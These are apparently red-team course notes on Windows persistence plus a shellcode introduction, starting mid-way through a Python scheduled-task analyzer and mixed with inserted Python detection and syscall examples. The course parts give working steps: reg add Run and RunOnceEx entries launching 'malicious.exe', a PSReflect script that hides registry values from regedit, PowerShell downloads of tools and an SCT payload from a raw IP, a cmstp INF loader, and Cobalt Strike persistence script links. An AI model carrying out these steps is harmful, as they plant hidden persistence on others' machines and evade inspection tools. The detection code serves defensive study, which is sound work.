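    if _text(root, "t:Principals/t:Principal/t:UserId") == "S-1-5-18":
        findings.append("runs as LocalSystem (S-1-5-18)")

    # The Subscription is an XPath-style event query; the EventID inside it
    # tells you how often the action will fire.
    subscription = _text(root, "t:Triggers/t:EventTrigger/t:Subscription")
    m = re.search(r"EventID=(\d+)", subscription)
    if m:
        findings.append(f"event-triggered on EventID {m.group(1)} (fires whenever that event is logged)")

    # Heuristic (this example's own): the first word of Author should show up in the command path
    author = _text(root, "t:RegistrationInfo/t:Author")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    vendor = author.split()[0].lower() if author else ""
    if vendor and command and vendor not in command.lower():
        findings.append(f"Author claims '{author}' but command {command!r} does not reference that vendor")

    return findings


if __name__ == "__main__":
    for finding in analyze_task(SAMPLE_TASK_XML) or ["no findings"]:
        print("-", finding)
```

Running it over every file under C:\Windows\System32\Tasks (the on-disk copies of registered tasks) gives a quick triage list; the Hidden flag alone is a strong signal, since legitimate vendor updaters rarely set it.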




---- Registry Based Persistence ---
1. RunOnce key persistence trick
Reference:
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/



1. upload your executable to the system
2. add the registry entry (requires admin privileges):
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"

Note:
The Beacon/shell may prevent the user from logging in, as the logon process hangs in the Beacon executable. Solution: spawn a new beacon and exit the initial beacon.





2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
Let's try this:
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/


3. Hide Reg
Let's try this code out:
https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741

Reference:
https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353




Get the following two files
---------------------------
https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1

In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible to regedit and PowerShell.

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell, or go to Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistance\PSReflect.ps1")

(new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistance\PSReflect-RegHide.ps1")

.\PSReflect-RegHide.ps1
-------------------------------------------------------------------------



Now, let's check to see if the newly created registry value is hidden. You can do this by typing the following:
---------------------------Type This-----------------------------------
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
-----------------------------------------------------------------------
However, it will still be visible to tools such as the Sysinternals Autoruns tool.



4. VShadow
Let's try this out:
https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/



1. Download vshadow.exe, which is included in the Windows SDK
Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
2. Upload vshadow.exe to the target machine
3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Run key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")


---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe", "c:\persistance\vshadow.exe")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
-----------------------------------------------------------------------


5. INF-SCT
Let's try this out:
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/


Technique 1: CMSTP
------------------
create "c:\persistance\cmstp.inf" with the following content:
-----------------------------------
;cmstp.exe cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:\persistance\test.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
----------------------------------------------------



get a sample sct payload (e.g. https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019) and store it in "c:\persistance\test.sct"


---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019", "c:\persistance\test.sct")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d "\"C:\Windows\System32\cmstp.exe\" /s C:\persistance\cmstp.inf"
-----------------------------------------------------------------------


reboot your machine
your sct payload will be executed upon reboot. HOWEVER, because a Windows binary executes it, the Sysinternals Autoruns tool will not show it unless you untick the "Options -> Hide Windows Entries" option



6. GPScript.exe
Let's try this out:
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/

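The registry techniques above share one shape: a Run or RunOnceEx value whose data launches a signed Windows binary (vshadow.exe, cmstp.exe, scrobj.dll via an INF) that in turn runs something from an unusual path, which is exactly why Autoruns' "Hide Windows Entries" filter hides them. The following Python example, added here and not part of the course notes, encodes those shapes as rules and runs them over constructed autorun values modelled on the reg add commands above (plus one ordinary vendor entry as a control). The value data is made up; in practice it would come from `reg query` output or a registry hive parser. It cannot see the PSReflect-hidden value from technique 3, since that one is invisible to the registry API itself.

```python
#!/usr/bin/env python3
"""Check autorun registry values for the launcher patterns used in the persistence techniques above."""
import re
from typing import Dict, Iterable, List

RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample values, as reg query / Get-ItemProperty would return them
SAMPLE_AUTORUNS = [
    {"key": RUN_KEY, "name": "VSSBackup",
     "data": r"c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"},
    {"key": RUN_KEY, "name": "oemkey",
     "data": r'"C:\Windows\System32\cmstp.exe" /s C:\persistance\cmstp.inf'},
    {"key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001", "name": "Line1",
     "data": r"||c:\path\to\malicious.exe"},
    {"key": RUN_KEY, "name": "OneDrive",  # control: an ordinary vendor entry
     "data": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
]

# (label, regex over the value data); all matched case-insensitively
DATA_RULES = [
    ("vshadow.exe used as a launcher (-exec=)", r"vshadow(?:\.exe)?\b.*-exec="),
    ("cmstp.exe silently installing an INF (/s)", r"cmstp(?:\.exe)?\"?\s+/s\b.*\.inf"),
    ("scriptlet execution through scrobj.dll", r"scrobj\.dll"),
    # leading quote or RunOnceEx "||" prefix, then a drive path outside the two usual install roots
    ("executable outside Program Files and Windows", r'^(?:"|\|\|)?[a-z]:\\(?!program files|windows\\)'),
]


def check_autorun(entry: Dict[str, str]) -> List[str]:
    """Return the rule labels that fire for one registry value."""
    findings = [label for label, pattern in DATA_RULES
                if re.search(pattern, entry["data"], re.IGNORECASE)]
    if re.search(r"\\RunOnceEx\\", entry["key"], re.IGNORECASE):
        findings.append("RunOnceEx entry (the technique from the oddvar.moe reference above)")
    return findings


def scan_autoruns(entries: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map value name -> findings, keeping only the values that fired at least one rule."""
    flagged: Dict[str, List[str]] = {}
    for entry in entries:
        findings = check_autorun(entry)
        if findings:
            flagged[entry["name"]] = findings
    return flagged


if __name__ == "__main__":
    for name, findings in scan_autoruns(SAMPLE_AUTORUNS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```

The "outside Program Files and Windows" rule is deliberately broad and will flag legitimate per-user software under %LOCALAPPDATA%; it is a triage aid to be read alongside the more specific LOLBin rules, not a verdict on its own.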
---- Cobalt Strike Aggressor Persistence Scripts ----
https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna

References:
https://docs.broadcom.com/doc/istr-living-off-the-land-and-fileless-attack-techniques-en






Day 4
--------

https://drive.google.com/file/d/16Ju5DHfsQAz2N-peWwElU8hb8BnR6cPv/view?usp=sharing
https://drive.google.com/file/d/1-5JbaoRJzs9He2gFNb9RJDuaQwnLhngw/view?usp=sharing




Intro to Shellcode

Step 1: Download and install CodeBlocks
https://sourceforge.net/projects/codeblocks/files/Binaries/20.03/Windows/codeblocks-20.03mingw-setup.exe/download

If you are new to the CodeBlocks tool like I was, here is the manual:
http://codeblocks.org/docs/manual_codeblocks_en.pdf


Step 2: Create a folder on your desktop called ShellCoding


Step 3: Save arwin.c, OllyDbg and ListDLLs into this new ShellCoding folder on your Desktop
Go to http://www.vividmachines.com/shellcode/arwin.c, http://www.ollydbg.de/odbg201.zip, and https://download.sysinternals.com/files/ListDlls.zip
to download these files into the new ShellCoding folder on your Desktop


Step 4: Compile arwin.c
Open arwin.c in the CodeBlocks application, and choose the option to "Build".
Open a command prompt and browse to the ShellCoding folder. Type 'dir' to ensure that arwin.exe is in the directory.
If it's not there, then there was an issue with your build. Ask me to help you troubleshoot this.


Step 5: Linux vs Windows code execution basics
Linux, unlike Windows, provides a direct way to interface with the kernel through the int 0x80 interface. A complete listing of the Linux syscall table can be found here (https://filippo.io/linux-syscall-table/). Windows, on the other hand, does not have a direct kernel interface. The system must be interfaced by loading the address of the function that needs to be executed from a DLL (Dynamic Link Library).

The key difference between the two is the fact that the addresses of the functions found in Windows vary from OS version to OS version, while the int 0x80 syscall numbers remain constant. Windows programmers did this so that they could make any change needed to the kernel without any hassle; Linux, on the contrary, has a fixed numbering system for all kernel-level functions, and if they were to change there would be a million angry programmers (and a lot of broken code).

Step 6: Look at the DLLs utilized by exe files
calc

Listdlls64.exe calc

notepad

Listdlls64.exe notepad




Step 7: Look at the addresses of the functions utilized by each DLL file

arwin.exe user32.dll MessageBoxA

arwin.exe kernel32.dll LoadLibraryA

arwin.exe kernel32.dll Sleep

arwin.exe kernel32.dll GetProcAddress

arwin.exe kernel32.dll ExitProcess

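The contrast in Step 5 and the lookup arwin.exe performs in Step 7 can both be shown from Python with ctypes, which is the following added example (not part of the course notes, and not arwin's own code). It asks the kernel for the process ID by syscall number, the fixed-number interface shellcode on Linux relies on, and next to that resolves a function's address by name from a loaded library, which is the LoadLibrary/GetProcAddress lookup arwin.exe does for a Windows DLL. It is written to run on Linux; on other platforms the functions return None rather than guessing. The syscall numbers in the table are the documented values from the syscall table linked above for the listed architectures; any other architecture is deliberately left out.

```python
#!/usr/bin/env python3
"""Contrast a fixed syscall number with a looked-up library address, from Python via ctypes."""
import ctypes
import ctypes.util
import os
import platform
from typing import Dict, Optional

# Linux getpid syscall numbers per architecture (from the syscall table linked in Step 5).
# Only architectures the author of this example is certain of are listed.
GETPID_SYSCALL = {"x86_64": 39, "i386": 20, "i686": 20, "aarch64": 172}


def getpid_via_syscall() -> Optional[int]:
    """Ask the kernel for our PID by number, the way int 0x80 / syscall shellcode does.

    Returns None when not on Linux or when the architecture is not in the table.
    """
    if platform.system() != "Linux":
        return None
    number = GETPID_SYSCALL.get(platform.machine())
    if number is None:
        return None
    libc = ctypes.CDLL(ctypes.util.find_library("c") or "libc.so.6", use_errno=True)
    libc.syscall.restype = ctypes.c_long
    return int(libc.syscall(ctypes.c_long(number)))


def resolve_address(library: str, symbol: str) -> Optional[int]:
    """The arwin.exe idea on any platform: load a library and return a function's address.

    This is the lookup Windows shellcode must perform (LoadLibraryA + GetProcAddress)
    because the address differs between OS builds and, with ASLR, between runs.
    Returns None when the library or symbol cannot be found.
    """
    path = ctypes.util.find_library(library) or library
    try:
        lib = ctypes.CDLL(path)
        func = getattr(lib, symbol)
    except (OSError, AttributeError):
        return None
    return ctypes.cast(func, ctypes.c_void_p).value


def demo() -> Dict[str, object]:
    """Return both lookups so the two mechanisms can be compared side by side."""
    pid = getpid_via_syscall()
    return {
        "pid_from_syscall": pid,
        "pid_matches_os_getpid": None if pid is None else pid == os.getpid(),
        "printf_address": resolve_address("c", "printf"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        if isinstance(value, int) and key.endswith("address"):
            print(f"{key}: {value:#x}")
        else:
            print(f"{key}: {value}")
```

Run it twice: the syscall number never changes, while printf's address moves with each run on a system with ASLR, which is the property that forces Windows shellcode to resolve addresses at run time rather than hard-code them.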
Step 8: Get a message box to pop up
https://resources.infosecinstitute.com/injecting-spyware-exe-code-injections/#gref

Step 9: Do chapters 1-3 in this shellcoding tutorial
https://www.exploit-db.com/docs/english/17065-manual-shellcode.pdf